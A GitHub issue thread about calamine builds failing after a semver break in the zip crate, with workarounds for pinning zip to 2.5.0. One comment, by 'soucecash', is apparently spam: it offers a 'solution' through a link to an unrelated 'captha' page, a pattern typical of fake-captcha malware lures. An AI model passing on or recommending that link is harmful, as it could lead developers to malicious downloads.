### ISSUE TITLE
Builds failing due to semver violation in Zip

### ISSUE THREAD

**Issue by ddimaria** [tafia/calamine#492]
Issue in Zip: https://github.com/zip-rs/zip2/issues/332

The workaround is to fix calamine to version 2.5.0 of Zip in Cargo.toml.

**Comment by itaysmalia** [comment]
@ddimaria is there any workaround if I have a dependancy that uses calamine? how can I pin the version of zip? the `[replace]` section in Cargo.toml does not work:
```toml
[replace]
"zip:2.6.0" = { git = "https://github.com/zip-rs/zip2", rev = "v2.5.0" }
```
leads to:
```
error: failed to get `zip` as a dependency of package `calamine v0.26.1`
    ... which satisfies dependency `calamine = "^0.26.1"` (locked to 0.26.1) of package `nu-command v0.103.0`
    ... which satisfies dependency `nu-command = "^0.103.0"` (locked to 0.103.0) of package `XXX v0.1.0 (XXX)`
```

**Comment by ddimaria** [comment]
@itaysmalia maybe try replacing the version number with the commit hash: `77cde6a`.  We're working on a fix and will post here when we have it.

**Comment by ddimaria** [comment]
Fix if anyone needs it: https://github.com/zip-rs/zip2/issues/332#issuecomment-2776871893

**Comment by iam888** [comment]
any progress?

**Comment by Stigmatized** [comment]
an other easier fix than cloning would be to just 

cargo update -p zip --precise 2.5.0

**Comment by soucecash** [comment]
I think I might a solution to your problem. Check it out here [click](https://javierlopez.eu/captha/)

**Comment by simnalamburt** [comment]
For those who prefer not to use the git:// protocol, you can use the following workaround:

```toml
# Cargo.toml
[patch.crates-io]
zip = { version = "=2.5.0", registry = "crates-io-2" }
```
```toml
# .cargo/config.toml
[registries]
crates-io-2 = { index = "sparse+https://index.crates.io/" }
```

###### Reference
- https://github.com/rust-lang/cargo/issues/5478
